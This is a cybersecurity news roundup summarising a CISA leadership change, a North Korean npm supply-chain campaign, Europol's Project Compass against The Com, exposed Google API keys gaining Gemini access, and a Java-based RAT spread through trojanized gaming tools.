CISA Replaces Acting Director After a Bumbling Year on the Job
The Trump administration has ousted Madhu Gottumukkala as acting director of the Cybersecurity and Infrastructure Security Agency, replacing him with Nick Andersen, the agency’s former top cybersecurity official, after a turbulent tenure marked by reports of Gottumukkala uploading sensitive government documents to a public version of ChatGPT, failing a counterintelligence polygraph, and presiding over the departure of at least one-third of the agency’s workforce through buyouts and early retirements. The shakeup also claimed the agency’s Chief Information Officer Bob Costello and acting Chief Human Capital Officer Kevin Diana, both of whom were reassigned or shown the door. Andersen — a veteran of cybersecurity leadership roles at the Coast Guard, Navy, and Department of Energy — received an unusually warm welcome from CISA staff, with multiple employees describing his appointment as the best news the agency had received in over a year; the agency still lacks a Senate-confirmed permanent director, with nominee Sean Plankey’s confirmation stalled pending release of a report on Salt Typhoon telecommunications vulnerabilities.
North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT
Researchers at Socket have uncovered a sophisticated North Korean supply chain attack dubbed “StegaBin,” in which the Famous Chollima threat cluster — linked to Lazarus Group — published 26 malicious npm packages between February 25–26 that impersonate popular developer libraries including Express, Fastify, lodash, and others, each designed to trigger a hidden install script that decodes command-and-control addresses steganographically concealed inside seemingly innocent computer science essays on Pastebin, then fetches platform-specific payloads routing through 31 Vercel deployments. Once installed, the malware deploys a nine-module infostealer toolkit purpose-built for developer workstations, targeting VSCode configurations (with a 186-space whitespace persistence trick), SSH keys, Git repositories, browser credential stores, cryptocurrency wallet extensions, clipboard data, and secrets via a weaponized TruffleHog scanner — all exfiltrated over a live C2 at 103[.]106[.]67[.]63. All 26 packages have been removed from the npm registry, but organizations are advised to audit dependencies and monitor for unusual outbound connections to Pastebin and Vercel endpoints.
Project Compass Is Europol’s New Playbook for Taking on ‘The Com’
Europol has announced the first operational results of Project Compass, a yearlong joint initiative coordinated by its European Counter Terrorism Centre with participation from 28 countries — including all Five Eyes nations — targeting The Com, a sprawling decentralized network of primarily English-speaking cybercriminals aged 13 to 25 responsible for ransomware attacks on UK retailers Marks & Spencer, Co-op, and Harrods, the 2023 Las Vegas casino breaches, and the coercion of minors into producing child sexual exploitation material. Since launching in January 2025, the operation has resulted in 30 arrests, the full or partial identification of 179 additional perpetrators, and the safeguarding of four victims; among those arrested are two alleged leaders of the Com sub-network 764, Leonidas Varagiannis and Prasan Nepal, who face life in prison for directing an international child exploitation ring. Europol framed Project Compass as an intelligence-sharing architecture rather than a one-time bust, emphasizing that the initiative will continue building joint investigative capacity across counter-terrorism, CSAM, and organized crime units as The Com’s tactics evolve.
Thousands of Public Google Cloud API Keys Exposed with Gemini Access After Silent API Enablement
Security researchers at Truffle Security disclosed that Google’s single API key format — the AIza… string Google has explicitly instructed developers to embed in public client-side code for over a decade — silently gains authentication access to sensitive Gemini AI endpoints whenever the Generative Language API is enabled on a Google Cloud project, with no warning, no confirmation dialog, and no email notification to the developer. A scan of the November 2025 Common Crawl dataset identified 2,863 live exposed keys belonging to major financial institutions, security companies, global recruiting firms, and Google itself; any attacker can extract one from a webpage’s source code and immediately access private uploaded files, cached AI context, and billable inference services — or generate thousands of dollars in daily charges against the victim’s account. Google has begun blocking known-exposed keys and committed to scoped defaults for new AI Studio keys going forward, but the root-cause architectural fix was still in progress when Truffle published after the 90-day disclosure window expired, and organizations are urged to audit all GCP projects immediately for the Generative Language API and rotate any publicly accessible keys.
Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms
Microsoft Threat Intelligence has flagged an active campaign distributing a multi-purpose Java-based remote access trojan through malicious gaming utilities spread via browsers and messaging platforms, with the attack chain staging a portable Java runtime, executing a malicious JAR file named jd-gui.jar, and leveraging PowerShell alongside living-off-the-land binaries like cmstp.exe for stealthy execution while simultaneously deleting the initial downloader and configuring Microsoft Defender exclusions to evade detection. Persistence is achieved via a scheduled task and a Windows startup script named world.vbs, with the final payload capable of functioning as a loader, runner, downloader, and full RAT. The campaign was disclosed alongside separate findings from BlackFog on a new Windows RAT called Steaelite — sold on criminal forums since November 2025 as fully undetectable — which bundles data theft and ransomware into a single web panel with keylogging, clipboard monitoring, UAC bypass, and an Android ransomware module reportedly in development.
